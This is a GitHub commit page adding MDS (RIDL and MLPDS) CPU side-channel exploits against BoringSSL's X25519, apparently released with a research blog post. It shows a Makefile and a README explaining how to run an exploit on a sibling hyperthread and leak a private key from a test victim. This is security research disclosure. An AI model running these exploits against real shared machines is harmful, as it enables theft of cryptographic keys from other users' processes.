-
Notifications
You must be signed in to change notification settings - Fork 411
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Add X25519 MDS exploits for blog post. (#43)
Co-authored-by: Adam Krasuski <[email protected]>
- Loading branch information
1 parent
14be063
commit 30a8c57
Showing
7 changed files
with
3,094 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,21 @@ | ||
.PHONY: all clean | ||
|
||
all: leak_evict_x25519 leak_intermediate_x25519 leak_multiprocess x25519_victim | ||
|
||
CFLAGS=-O3 -mrtm -static -masm=intel | ||
|
||
boringssl/crypto/curve25519/fake_x25519.c: fake_x25519.c | ||
git clone https://boringssl.googlesource.com/boringssl || true | ||
cp fake_x25519.c boringssl/crypto/curve25519/fake_x25519.c | ||
|
||
leak_intermediate_x25519: boringssl/crypto/curve25519/fake_x25519.c leak_intermediate_x25519.c | ||
cc $^ -o $@ $(CFLAGS) -Iboringssl/include | ||
|
||
leak_multiprocess: boringssl/crypto/curve25519/fake_x25519.c leak_multiprocess.c | ||
cc $^ -o $@ $(CFLAGS) -Iboringssl/include | ||
|
||
x25519_victim: boringssl/crypto/curve25519/curve25519.c x25519_victim.c | ||
cc $^ -o $@ $(CFLAGS) -Iboringssl/include -lssl -lcrypto | ||
|
||
clean: | ||
- rm -rf leak_evict_x25519 leak_intermediate_x25519 leak_multiprocess x25519_victim boringssl |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,57 @@ | ||
|
||
|
||
# MDS exploits | ||
|
||
## How to run | ||
|
||
The RIDL exploit, `leak_evict_x25519.c` unfortunately targets an internal | ||
server, so you won't be able to reproduce our results. | ||
|
||
MLPDS exploit, although it targets the same server, does not depend on its | ||
memory layout etc. - so we prepared a custom victim that just calls `X25519` | ||
function in an infinite loop. To run, first compile the code: | ||
|
||
``` | ||
make | ||
``` | ||
|
||
This will also clone the boringssl repository (it's a dependency). | ||
Check how many cores your CPU has: | ||
|
||
``` | ||
nproc --all | ||
``` | ||
|
||
For my workstation, it prints `12`, which means I have 6 cores (with | ||
hyperthreading doubling the number). Run the victim: | ||
|
||
``` | ||
taskset -a -c 2 ./x25519_victim | ||
``` | ||
|
||
In another terminal, run the exploit: | ||
|
||
``` | ||
taskset -a -c 8 ./leak_intermediate_x25519 <<< "1 2 3 4 5 6 7 8 9 a b c d e f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20" | ||
``` | ||
|
||
The `1 2 3...` string is the client private key used in X25519. | ||
Note that I pin the two processes to cores 2 and 8, which are 6 apart - meaning | ||
they occupy sibling threads. You should see some intermediate output pretty quickly, and | ||
after 255 iterations (say 10 minutes, depending on CPU), the process will finish. | ||
The last line will show the leaked secret: | ||
|
||
``` | ||
Secret: 70 72 69 76 74 65 73 74 31 32 33 34 35 36 37 38 73 6f 6d 65 6d 6f 72 65 62 69 74 73 41 42 43 44 | ||
``` | ||
|
||
If you decode the hexadecimal, it says `privtest12345678somemorebitsABCD`, which | ||
was the private key hardcoded in `x25519_victim.c`. | ||
|
||
If you wait several minutes and always get only `--- diff_abs 0 (0 vs. 0, total 0)` | ||
result, something's wrong. You should check if hyperthreading is enabled, and | ||
that your CPU supports TSX and it's not disabled. | ||
|
||
If you want to try the multithreaded exploit, `leak_multiprocess.c`, before | ||
compiling change the `#define CPU_NUM 6` to the actual number of cores in your | ||
CPU. Other than that, the usage is the same. |
Oops, something went wrong.